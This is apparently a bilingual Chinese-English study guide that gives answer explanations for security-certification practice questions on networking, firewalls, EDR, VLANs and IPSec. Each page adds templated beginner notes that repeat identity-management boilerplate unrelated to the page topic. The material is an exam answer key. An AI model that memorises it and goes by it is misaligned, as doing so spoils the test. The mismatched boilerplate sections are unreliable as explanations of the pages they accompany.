仅在洪水模式下运行。 (B) MAC地址欺骗用于伪造系统的物理地址,以冒 充另一台授权设备。 ARP欺骗将IP地址与错误的MAC地址关联。 (C) MAC地址欺骗依赖于明文以太网报头来初步获取合法网络设备的有效 MAC地址。 ICMP跨越路由器,因为它作为IP数据包的有效载荷传输。 12. D. 在此场景中,无法从 SAN 恢复文件的最可能原因是重复数据删除。 重 复数据删除会将多个文件副本替换为指向单个副本的指针。 如果剩余的唯一文 件受损,则所有链接的副本也会受损或无法访问。 文件加密可能是一个问题, 但场景中提到多个人共同参与项目,而文件加密通常由个人而非团队使用。 对 于团队访问的文件以及 SAN 本身,全盘加密更为合适。 此问题与所使用的 SAN 技术(如光纤通道)无关。 通过恢复备份(无论是实时备份还是非实时 备份)可能解决此问题,但文件丢失并非由执行备份引起。 13. D. 在此场景中,恶意软件正在执行 MAC 泛洪攻击,导致交换机陷入泛洪 模式。 这利用了交换机配置设置薄弱的条件。 交换机应启用 MAC 限制功能, 以防止 MAC 泛洪攻击成功。

尽管吉姆最初被一封社会工程学邮件欺骗,但问 题询问的是恶意软件的活动。 MAC 泛洪攻击受网络分段限制,仅限于本地交 换机,但该恶意软件利用了交换机的弱配置或不当配置,仍取得了成功。 路由 器可阻止 MAC 泛洪攻击跨越交换网络段。 恶意软件在攻击中未使用 ARP 查 询。 ARP 查询可在 ARP 欺骗攻击中被滥用,但本场景中并未描述此类情况。 14. B. 交换机是一种智能集线器。 它被认为是智能的,因为它知道连接在每个 出端口上的系统的地址。 中继器用于增强电缆段上的通信信号,以及连接使用 相同协议的网络段。 网桥用于将两个网络连接在一起——即使网络具有不同的 拓扑结构、布线类型和速度——以连接使用相同协议的网络段。 路由器用于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 116 / PDF P1510

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. Routers manage traffic based on logical IP addressing. 15. B. A screened subnet is a type of security zone that can be positioned so that it operates as a buffer network between the secured private network and the Internet and can host publicly accessible services. A honeypot is a false network used to trap intruders; it isn't used to host public services. An extranet is for limited outside partner access, not public. An intranet is the private secured network. 16. B. A Faraday cage is an enclosure that blocks or absorbs electromagnetic fields or signals.

Faraday cage containers, computer cases, rack-mount systems, rooms, or even building materials are used to create a blockage against the transmission of data, information, metadata, or other emanations from computers and other electronics. Devices inside a Faraday cage can use EM fields for communications, such as wireless or Bluetooth, but devices outside of the cage will not be able to eavesdrop on the signals of the systems within the cage. Air gaps do not contain or restrict wireless communications—in fact, for an air gap to be effective, wireless cannot even be available. Biometric authentication has nothing to do with controlling radio signals.

Screen filters reduce shoulder surfing but do not address radio signals. 17. B, E, F. Network access control (NAC) involves controlling access to an environment through strict adherence to and implementation of security policy. The goals of NAC are to detect/block rogue devices, prevent or reduce zero-day attacks, confirm compliance with updates and security settings, enforce security policy throughout the network, and use identities to perform access control. NAC does not address social engineering, mapping IP addresses, or distributing IP addresses—those are handled by training, NAT, and DHCP, respectively. 18. A.

Endpoint detection and response (EDR) is a security mechanism that is an evolution of traditional antimalware products. EDR seeks to detect, record, evaluate, and respond to suspicious activities and events, which may be caused by problematic software or by valid and invalid users. It is a natural extension of continuous monitoring, focusing on both the endpoint device itself and network communications reaching the local interface. Some EDR solutions employ an on-device analysis engine whereas others report events back to a central analysis server or to a

中文直译 / 整理

控制网络上的流量流,并常用于连接相似网络并控制两者之间的流量 流。 路由器基于逻辑IP地址管理流量。 15. B. 筛选子网是一种安全区域,可以部署在受保护的私有网络与互联网之 间,作为缓冲网络,并托管公开可访问的服务。 蜜罐是一个用于诱捕入侵者 的虚假网络,不用于托管公共服务。 外联网用于有限的外部合作伙伴访问, 而非公开访问。 内联网是私有的受保护网络。 16. B. 法拉第笼是一种能够阻挡或吸收电磁场或信号的封闭结构。 法拉第笼 容器、计算机机箱、机架式系统、房间甚至建筑材料均可用于阻止计算机及 其他电子设备传输数据、信息、元数据或其他电磁辐射。 法拉第笼内的设备 可使用电磁场进行通信,例如无线或蓝牙,但笼外的设备无法窃听笼内系统 的信号。 空气隔离不包含或限制无线通信——事实上,要使空气隔离有效, 无线通信甚至不能存在。 生物识别认证与控制无线电波信号无关。 屏幕滤光 片可减少窥视攻击,但无法解决无线电波信号问题。 17. B、E、F。 网络访问控制(NAC)通过严格遵守和实施安全策略来控制对 环境的访问。

NAC的目标是检测/阻止未经授权的设备、防止或减少零日攻击、 确认是否符合更新和安全设置、在整个网络中强制执行安全策略,并使用身 份执行访问控制。 NAC不涉及社会工程学、IP地址映射或IP地址分配——这 些分别由培训、NAT和DHCP处理。 18. A。 端点检测与响应(EDR)是一种安全机制,是传统反恶意软件产品的 演进。 EDR旨在检测、记录、评估和响应可疑活动和事件,这些活动和事件 可能由有问题的软件或有效/无效用户引起。 它是持续监控的自然延伸,重点 关注端点设备本身以及到达本地接口的网络通信。 一些EDR解决方案采用设 备端分析引擎,而其他解决方案则将事件报告回中央分析服务器或到

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 117 / PDF P1511

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

cloud solution. The goal of EDR is to detect abuses that are potentially more advanced than what can be detected by traditional antivirus or HIDSs, while optimizing the response time of incident response, discarding false positives, implementing blocking for advanced threats, and protecting against multiple threats occurring simultaneously and via various threat vectors. A next-generation firewall (NGFW) is a unified threat management (UTM) device that is based on a traditional firewall with numerous other integrated network and security services and is thus not the security solution needed in this scenario.

A web application firewall (WAF) is an appliance, server add-on, virtual service, or system filter that defines a strict set of communication rules for a website and is not the security solution needed in this scenario. Cross-site request forgery (XSRF) is an attack against web-based services, not a malware defense. 19. A. An application-level firewall is able to make access control decisions based on the content of communications as well as the parameters of the associated protocol and software. Stateful inspection firewalls make access control decisions based on the content and context of communications, but are not typically limited to a single applicationlayer protocol.

Circuit-level firewalls are able to make permit and deny decisions in regard to circuit establishment either based on simple rules for IP and port, using captive portals, requiring port authentication via 802.1X, or more complex elements such as contextor attribute-based access control. Static packet-filtering firewalls filter traffic by examining data from a message header. Usually, the rules are concerned with source and destination IP address (Layer 3) and port numbers (Layer 4). 20. A, C, D. Most appliance (i.e., hardware) firewalls offer extensive logging, auditing, and monitoring capabilities as well as alarms/alerts and even basic IDS functions.

It is also true that firewalls are unable to prevent internal attacks that do not cross the firewall. Firewalls are unable to block new phishing scams. Firewalls could block a phishing scam's URL if it was already on a block list, but a new scam likely uses a new URL that is not yet known to be malicious.

中文直译 / 整理

云解决方案。 EDR的目标是检测可能比传统防病毒软件或HIDS更高级的 滥用行为,同时优化事件响应的响应时间,剔除误报,实施对高级威胁的 阻断,并保护系统免受多种同时发生且通过不同攻击向量的威胁。 下一代 防火墙(NGFW)是一种基于传统防火墙并集成了众多其他网络和安全服 务的统一威胁管理(UTM)设备,因此并非本场景所需的安防解决方案。 Web应用防火墙(WAF)是一种设备、服务器插件、虚拟服务或系统过 滤器,它为网站定义了一组严格的通信规则,也不是本场景所需的安防解 决方案。 跨站请求伪造(XSRF)是对基于Web的服务的攻击,而非恶意 软件防御手段。 19. A. 应用层防火墙能够根据通信内容以及相关协议和软件的参数做出访问控 制决策。 状态检测防火墙根据通信的内容和上下文做出访问控制决策,但通常 不限于单一的应用层协议。 电路级防火墙能够基于简单规则(如IP和端口)、 使用捕获门户、通过802.1X进行端口认证,或更复杂的元素(如基于上下文或 属性的访问控制)来决定是否允许或拒绝电路建立。 静态包过滤防火墙通过检 查消息头中的数据来过滤流量。 通常,规则涉及源和目标IP地址(第3层)和 端口号(第4层)。

20. A、C、D。 大多数设备(即硬件)防火墙提供广泛的日志记录、审计和 监控功能,以及警报/通知,甚至基本的入侵检测系统(IDS)功能。 同样正 确的是,防火墙无法阻止不经过防火墙的内部攻击。 防火墙无法阻止新的网 络钓鱼骗局。 如果某个网络钓鱼骗局的URL已在阻止列表中,防火墙可以阻 止它,但新的骗局很可能使用的是尚未被识别为恶意的新URL。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

审计:审计记录主体行为,用于追责、复盘和取证。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

没有日志和身份绑定,就很难问责。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
审计 审计记录主体行为,用于追责、复盘和取证。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 118 / PDF P1512

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Chapter 12: Secure Communications and Network Attacks 1. B. When transparency is a characteristic of a service, security control, or access mechanism, it is unseen by users. Invisibility is not the proper term for a security control that goes unnoticed by valid users. Invisibility is sometimes used to describe a feature of a rootkit, which attempts to hide itself and other files or processes. Diversion is a feature of a honeypot but not of a typical security control. Hiding in plain sight is not a security concept; it is a mistake on the part of the observer not to notice something that they should notice.

This is not the same concept as camouflage, which is when an object or subject attempts to blend into the surroundings. 2. A, C, D, E, G, I, J, K. More than 40 EAP methods have been defined, including LEAP, PEAP, EAP-SIM, EAP-FAST, EAP-MD5, EAP-POTP, EAP-TLS, and EAP-TTLS. The other options are not valid EAP methods. 3. B. Changing default passwords on PBX systems provides the most effective increase in security. PBX systems typically do not support encryption, although some VoIP PBX systems may support encryption in specific conditions. PBX transmission logs may provide a record of fraud and abuse, but they are not a preventive measure to stop it from happening.

Taping and archiving all conversations is also a detection measure rather than a preventive one against fraud and abuse. 4. C. Malicious attackers known as phreakers abuse phone systems in much the same way that attackers abuse computer networks. In this scenario, they were most likely focused on the PBX. Private branch exchange (PBX) is a telephone switching or exchange system deployed in private organizations in order to enable multistation use of a small number of external PSTN lines. Phreakers generally do not focus on accounting (that would be an invoice scam), NAT (that would be a network intrusion attack), or Wi-Fi (another type of network intrusion attack). 5. A, B, D.

It is important to verify that multimedia collaboration connections are encrypted, that robust multifactor authentication is in use, and that tracking and logging of events and activities is available for the hosting organization to review. Customization of avatars and filters is not a security concern.

中文直译 / 整理

第12章:安全通信与网络攻击 1. B。 当透明性是服务、安全控制或访问机制的特性时,用户无法察觉。 不 可见性并非用于描述对合法用户而言未被注意到的安全控制的正确术语。 不 可见性有时用于描述rootkit的特性,该特性试图隐藏自身以及其他文件或进 程。 诱骗是蜜罐的特性,而非典型安全控制的特性。 隐蔽在显眼之处并非安 全概念; 这是观察者未能注意到本应注意到的事物的错误。 这与伪装不同, 伪装是指物体或主体试图融入周围环境。 2. A、C、D、E、G、I、J、K。 已定义了40多种EAP方法,包括LEAP、PEAP、 EAP‑SIM、EAP‑FAST、EAP‑MD5、EAP‑POTP、EAP‑TLS和EAP‑TTLS。 其他 选项均不是有效的EAP方法。 3. B. 更改 PBX 系统的默认密码能最有效地提升安全性。 PBX 系统通常不支 持加密,尽管某些 VoIP PBX 系统在特定条件下可能支持加密。 PBX 传输日 志可能记录欺诈和滥用行为,但它们并非预防此类行为发生的措施。 录音并 归档所有通话也是一种检测措施,而非预防欺诈和滥用的措施。

4. C. 被称为音频破解者的恶意攻击者以与攻击计算机网络类似的方式滥用电 话系统。 在此场景中,他们最有可能针对的是 PBX。 专用交换机(PBX)是 一种部署在私人组织中的电话交换系统,旨在使多个站点能够共享少量外部 PSTN 线路。 音频破解者通常不关注计费(那将是发票欺诈)、NAT(那将 是网络入侵攻击)或 Wi‑Fi(另一种网络入侵攻击)。 5. A、B、D。 必须验证多媒体协作连接已加密,已使用强大的多因素身份验 证,并且托管组织可审查事件和活动的跟踪与日志记录。 自定义头像和滤镜 不属于安全问题。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 119 / PDF P1513

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

6. D. The issue in this scenario is that a private IP address from RFC 1918 is assigned to the web server. RFC 1918 addresses are not internet routable or accessible because they are reserved for private or internal use only. So, even with the domain name linked to the address, any attempt to access it from an internet location will fail. Local access via jumpbox or LAN system likely uses an address in the same private IP address range and has no issues locally. The issue of the scenario (i.e., being unable to access a website using its FQDN) could be resolved by either using a public IP address or implementing static NAT on the screened subnet's boundary firewall.

The jumpbox would not prevent access to the website regardless of whether it was rebooted, in active use, or turned off. That would only affect Michael's use of it from his desktop workstation. SplitDNS does support internet-based domain name resolution; it separates internal-only domain information from external domain information. A web browser should be compatible with the coding of most websites. Since there was no mention of custom coding and the site was intended for public use, it is probably using standard web technologies. Also, since Michael's workstation and several worker desktops could access the website, the problem is probably not related to the browser. 7. A.

Password Authentication Protocol (PAP) is a standardized authentication protocol for PPP. PAP transmits usernames and passwords in the clear. It offers no form of encryption. It provides a means to transport the logon credentials from the client to the authentication server. CHAP protects the password by never sending it across the network; it is used in computing a response along with a random challenge number issued by the server. EAP offers some means of authentication that protects and/or encrypts credentials, but not all of the options do. RADIUS supports a range of options to protect and encrypt logon credentials. 8. A, C, D, F, G, H, and J.

Network quality of service (QoS) depends on numerous factors, including bandwidth, latency, jitter, packet loss, interference, throughput, and signal-to-noise ratio. System uptime, application layer protocol, and OS versions are unlikely to be relevant related to network QoS investigations. 9. A, C, D. The addresses in RFC 1918 are 10.0.0.0–10.255.255.255, 172.16.0.0–172.31.255.255, and 192.168.0.0–192.168.255.255. Therefore, 10.0.0.18, 172.31.8.204, and 192.168.6.43 are private IPv4 addresses. The 169.254.x.x subnet is in the APIPA range, which is not part of RFC 1918. 6. D.

中文直译 / 整理

本场景中的问题是,为Web服务器分配了一个来自RFC 1918的私有I P地址。 RFC 1918地址无法在互联网上路由或访问,因为它们仅保留用于私 有或内部用途。 因此,即使域名已链接到该地址,从互联网位置尝试访问它 也会失败。 通过跳板机或局域网系统进行本地访问可能使用的是同一私有I P地址范围内的地址,因此在本地没有问题。 本场景的问题(即无法使用 FQDN访问网站)可以通过使用公有IP地址或在隔离子网的边界防火墙上实 施静态NAT来解决。 无论跳板机是否重启、是否正在使用或是否关闭,都不 会影响对网站的访问; 这仅会影响Michael从其桌面工作站使用跳板机。 Split‑DNS支持基于互联网的域名解析; 它将仅限内部的域名信息与外部域 名信息分开。 A 网页浏览器应能兼容大多数网站的代码。 由于未提及自定义代码,且该网 站旨在供公众使用,因此很可能使用的是标准网页技术。 此外,由于迈克 尔的工作站和多个工作人员的台式机都能访问该网站,问题很可能与浏览 器无关。 7. A. 密码认证协议(PAP)是PPP的标准化认证协议。 PAP以明文形式传 输用户名和密码。 它不提供任何形式的加密。

它提供了将登录凭证从客户端 传输到认证服务器的手段。 CHAP通过从不通过网络发送密码来保护密码; 它用于结合服务器发出的随机挑战号计算响应。 EAP提供了一些保护和/或 加密凭证的认证方式,但并非所有选项都具备此功能。 RADIUS支持多种选 项来保护和加密登录凭证。 8. A、C、D、F、G、H 和 J。 网络服务质量(QoS)取决于众多因素, 包括带宽、延迟、抖动、丢包率、干扰、吞吐量和信噪比。 系统正常运行 时间、应用层协议和操作系统版本不太可能与网络QoS调查相关。 9. A、C、D。 RFC 1918 中的地址为 10.0.0.0–10.255.255.255、172.16.0.0– 172.31.255.255 和 192.168.0.0–192.168.255.255。 因此,10.0.0.18、172.31.8.204 和 192.168.6.43 是私有 IPv4 地址。 169.254.x.x 子网属于 APIPA 范围,不属于 RFC 1918。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 120 / PDF P1514

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

10. D. An intermediary network connection is required for a VPN link to be established. A VPN can be established between devices over the Internet, between devices over a LAN, or between a system on the Internet and a LAN. 11. B. A switch is a networking device that can be used to create digital virtual network segments (i.e., VLANs) that can be altered as needed by adjusting the settings internal to the device. A router connects disparate networks (i.e., subnets) rather than creating network segments. Subnets are created by IP address and subnet mask assignment.

Proxy and firewall devices do not create digital virtual network segments, but they may be positioned between network segments to control and manage traffic. 12. B. VLANs do not impose encryption on data or traffic. Encrypted traffic can occur within a VLAN, but encryption is not imposed by the VLAN. VLANs do provide traffic isolation, traffic management and control, and a reduced vulnerability to sniffers. 13. B, C, D. Port security can refer to several concepts, including network access control (NAC), Transport Layer ports, and RJ-45 jack ports. NAC requires authentication before devices can communicate on the network.

Transport-layer port security involves using firewalls to grant or deny communications to TCP and UDP ports. RJ-45 jacks should be managed so that unused ports are disabled and that when a cable is disconnected, the port is disabled. This approach prevents the connection of unauthorized devices. Shipping container storage relates to shipping ports, which is a type of port that is not specifically related to IT or typically managed by a CISO. 14. B. Quality of service (QoS) is the oversight and management of the efficiency and performance of network communications. Items to measure include throughput rate, bit rate, packet loss, latency, jitter, transmission delay, and availability.

A virtual private network (VPN) is a communication channel between two entities across an intermediary untrusted network. Software-defined networking (SDN) aims at separating the infrastructure layer from the control layer on networking hardware in order to reduce management complexity. Sniffing captures network packers for analysis. QoS uses sniffing, but sniffing itself is not QoS. 10. D.

中文直译 / 整理

建立VPN连接需要中间网络连接。 VPN可以在设备之间通过互联网建立。 , 在局域网内的设备之间,或在互联网上的系统与局域网之间。 11. B. 交换机是一种网络设备,可用于创建数字虚拟网络段(即VLAN), 并通过调整设备内部设置按需更改。 路由器用于连接不同的网络(即子网), 而非创建网络段。 子网通过IP地址和子网掩码分配创建。 代理和防火墙设备 不会创建数字虚拟网络段,但它们可部署在网络段之间以控制和管理流量。 12. B. VLAN不会对数据或流量实施加密。 加密流量可以在VLAN内发生,但加密并 非由VLAN强制实施。 VLAN确实提供流量隔离、流量管理与控制,并降低被窃听的风险。 13. B、C、D. 端口安全可指多种概念,包括网络访问控制(NAC)、传输层 端口和RJ‑45接口端口。 NAC要求设备在能够通过网络通信前进行身份验证。 传输层端口安全涉及使用防火墙来允许或拒绝对TCP和UDP端口的通信。 RJ‑45接口应进行管理,使未使用的端口被禁用,并在电缆断开时禁用端口。 这种方法可防止未经授权的设备连接。 集装箱存储与航运港口相关,这是一种 与IT无关或通常不由CISO管理的端口类型。

14. B. 服务质量(QoS)是对网络通信效率和性能的监督与管理。 可衡量的 项目包括吞吐量、比特率、丢包率、延迟、抖动、传输延迟和可用性。 虚拟 专用网络(VPN)是在两个实体之间通过一个中间不可信网络建立的通信通 道。 软件定义网络(SDN)旨在将网络硬件中的基础设施层与控制层分离, 以降低管理复杂性。 嗅探用于捕获网络数据包以进行分析。 QoS 使用嗅探, 但嗅探本身并非 QoS。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

CISO 需要足够独立性和高层支持。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 121 / PDF P1515

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

15. D. When IPSec is used in tunnel mode, entire packets, rather than just the payload, are encrypted. Transport mode only encrypts the original payload, not the original header. Encapsulating Security Payload (ESP) is the encrypter of IPSec, not the mode of VPN connection. Authentication Header (AH) is the primary authentication mechanism of IPSec. 16. A. Authentication Header (AH) provides assurances of message integrity and identity verification (i.e., authentication). Encapsulating Security Payload (ESP) provides confidentiality and integrity of payload contents. ESP also provides encryption, offers limited authentication, and prevents replay attacks.

IP Payload Compression (IPComp) is a compression tool used by IPSec to compress data prior to ESP encrypting it in order to attempt to keep up with wire speed transmission. Internet Key Exchange (IKE) is the mechanism of IPSec that manages cryptography keys and is composed of three elements: OAKLEY, SKEME, and ISAKMP. 17. B. Data remanent destruction is a security concern related to storage technologies more so than an email solution. Essential email concepts, which local systems can enforce and protect, include nonrepudiation, message integrity, and access restrictions. 18. D. The backup method is not an important factor to discuss with end users regarding email retention.

The details of an email retention policy may need to be shared with affected subjects, which may include privacy implications, how long the messages are maintained (i.e., length of retainer), and for what purposes the messages can be used (such as auditing or violation investigations). 19. D. Static IP addressing is not an implication of multilayer protocols; it is a feature of the IP protocol when an address is defined on the local system rather than being dynamically assigned by DHCP. Multilayer protocols include the risk of VLAN hopping, multiple encapsulation, and filter evasion using tunneling. 20. B.

